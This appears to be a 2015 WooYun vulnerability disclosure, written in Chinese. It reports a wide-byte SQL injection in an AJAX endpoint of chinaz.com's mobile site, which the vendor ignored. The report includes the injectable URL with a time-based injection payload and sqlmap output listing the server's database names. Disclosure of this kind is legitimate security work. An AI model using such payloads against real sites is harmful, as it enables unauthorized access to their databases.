当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146860

漏洞标题:站长之家手机端某接口宽字节SQL注入

相关厂商:站长之家

漏洞作者: 路人甲

提交时间:2015-10-15 09:37

修复时间:2015-10-20 09:38

公开时间:2015-10-20 09:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-15: 细节已通知厂商并且等待厂商处理中
2015-10-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

站长之家手机端接口宽字节注入

详细说明:

http://m.chinaz.com/ajax.php?action=ajaxdata&alias=index&jsoncallback=1&page=1
注入点 alias
http://m.chinaz.com/ajax.php?action=ajaxdata&alias=index%df' xor sleep(4)&jsoncallback=1&page=1

漏洞证明:

[22:01:57] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
[22:01:57] [INFO] fetching database names
[22:01:57] [INFO] fetching number of databases
[22:01:57] [WARNING] time-based comparison requires larger statistical model, please wait..............................                                                                                                                    
[22:02:37] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[22:03:07] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
6
[22:04:11] [INFO] retrieved: infqrmation_schema
[22:41:14] [INFO] retrieved: cmsup
[22:55:54] [ERROR] invalid character detected. retrying..
q !
[23:00:22] [ERROR] invalid character detected. retrying..
  
[23:04:47] [INFO] retrieved: 
[23:08:29] [ERROR] invalid character detected. retrying..
qzssl
[23:21:07] [INFO] retrieved: ph{\?81ormance_schema
[23:59:38] [INFO] retrieved: qingdan
[00:12:53] [INFO] retrieved: test
available databases [6]:
[*] `cmsupq\x11!\x10\x07`
[*] `ph{\\?81ormance_schema`
[*] infqrmation_schema
[*] qingdan
[*] qzssl
[*] test

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-20 09:38

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无